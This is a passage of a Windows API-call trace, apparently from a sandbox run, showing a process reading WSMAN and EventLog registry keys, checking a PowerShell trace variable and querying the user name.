samDesired=0x20019, phkResult=0x25e3dc | out: phkResult=0x25e3dc*=0x328) returned 0x0 [0141.567] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e42c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e430, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e42c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e430*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.568] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x2e48d0, lpcchValueName=0x25e454, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25e454, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0141.568] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x2e48d0, lpcchValueName=0x25e454, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25e454, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0141.568] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e434, lpData=0x0, lpcbData=0x25e430*=0x0 | out: lpType=0x25e434*=0x1, lpData=0x0, lpcbData=0x25e430*=0x8) returned 0x0 [0141.568] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e434, lpData=0x2e48d0, lpcbData=0x25e430*=0x8 | out: lpType=0x25e434*=0x1, lpData="2.0", lpcbData=0x25e430*=0x8) returned 0x0 [0141.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e398 | out: phkResult=0x25e398*=0x32c) returned 0x0 [0141.600] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3e8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3e8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3ec*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.600] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x2e48d0, lpcchValueName=0x25e410, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25e410, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0141.600] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x2e48d0, lpcchValueName=0x25e410, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25e410, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0141.601] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e3f0, lpData=0x0, lpcbData=0x25e3ec*=0x0 | out: lpType=0x25e3f0*=0x1, lpData=0x0, lpcbData=0x25e3ec*=0x8) returned 0x0 [0141.601] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e3f0, lpData=0x2e48d0, lpcbData=0x25e3ec*=0x8 | out: lpType=0x25e3f0*=0x1, lpData="2.0", lpcbData=0x25e3ec*=0x8) returned 0x0 [0141.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.602] GetLastError () returned 0xcb [0141.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.605] GetLastError () returned 0xcb [0141.613] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e358 | out: phkResult=0x25e358*=0x330) returned 0x0 [0141.614] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3c0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3bc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3c0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3bc*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.614] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.615] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.615] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.615] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.615] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.615] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.615] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.616] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.616] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x2e48d0, lpcchName=0x25e3dc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3dc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.616] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x34c) returned 0x0 [0141.616] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.616] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x360) returned 0x0 [0141.616] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.616] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x364) returned 0x0 [0141.617] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.617] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x368) returned 0x0 [0141.617] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.617] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x36c) returned 0x0 [0141.617] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.617] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x370) returned 0x0 [0141.617] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.618] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x374) returned 0x0 [0141.618] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.618] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x378) returned 0x0 [0141.618] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x0) returned 0x2 [0141.618] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x37c) returned 0x0 [0141.618] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x380) returned 0x0 [0141.619] RegCloseKey (hKey=0x380) returned 0x0 [0141.619] RegCloseKey (hKey=0x330) returned 0x0 [0141.619] RegCloseKey (hKey=0x37c) returned 0x0 [0141.690] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e4d4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e4d4) returned 0x1 [0141.691] GetLastError () returned 0x3 [0141.692] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e4dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e4dc) returned 1 [0141.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e33c | out: phkResult=0x25e33c*=0x330) returned 0x0 [0141.731] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3a4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3a0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3a4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3a0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.731] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.731] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.731] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.731] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.731] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.731] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.732] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.732] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.732] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.732] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x380) returned 0x0 [0141.732] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.733] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x384) returned 0x0 [0141.733] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.733] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x388) returned 0x0 [0141.733] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.733] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x38c) returned 0x0 [0141.733] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.733] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x390) returned 0x0 [0141.734] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.734] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x394) returned 0x0 [0141.734] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.734] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x398) returned 0x0 [0141.734] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.734] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x39c) returned 0x0 [0141.735] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.735] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3a0) returned 0x0 [0141.735] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3a4) returned 0x0 [0141.735] RegCloseKey (hKey=0x3a4) returned 0x0 [0141.735] RegCloseKey (hKey=0x330) returned 0x0 [0141.735] RegCloseKey (hKey=0x3a0) returned 0x0 [0141.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e33c | out: phkResult=0x25e33c*=0x3a0) returned 0x0 [0141.736] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3a4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3a0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3a4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3a0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.736] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.737] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.737] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x2e48d0, lpcchName=0x25e3c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.737] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x330) returned 0x0 [0141.737] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.737] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3a4) returned 0x0 [0141.737] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.738] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3a8) returned 0x0 [0141.738] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.738] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3ac) returned 0x0 [0141.738] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.738] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3b0) returned 0x0 [0141.738] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.739] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3b4) returned 0x0 [0141.739] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.739] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3b8) returned 0x0 [0141.739] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.739] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3bc) returned 0x0 [0141.739] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x0) returned 0x2 [0141.739] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3c0) returned 0x0 [0141.740] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x3c4) returned 0x0 [0141.740] RegCloseKey (hKey=0x3c4) returned 0x0 [0141.740] RegCloseKey (hKey=0x3a0) returned 0x0 [0141.740] RegCloseKey (hKey=0x3c0) returned 0x0 [0141.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e330 | out: phkResult=0x25e330*=0x3c0) returned 0x0 [0141.740] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e398, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e394, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e398*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e394*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0141.741] RegEnumKeyExW (in: hKey=0x3c0, dwIndex=0x0, lpName=0x2e48d0, lpcchName=0x25e3b4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", 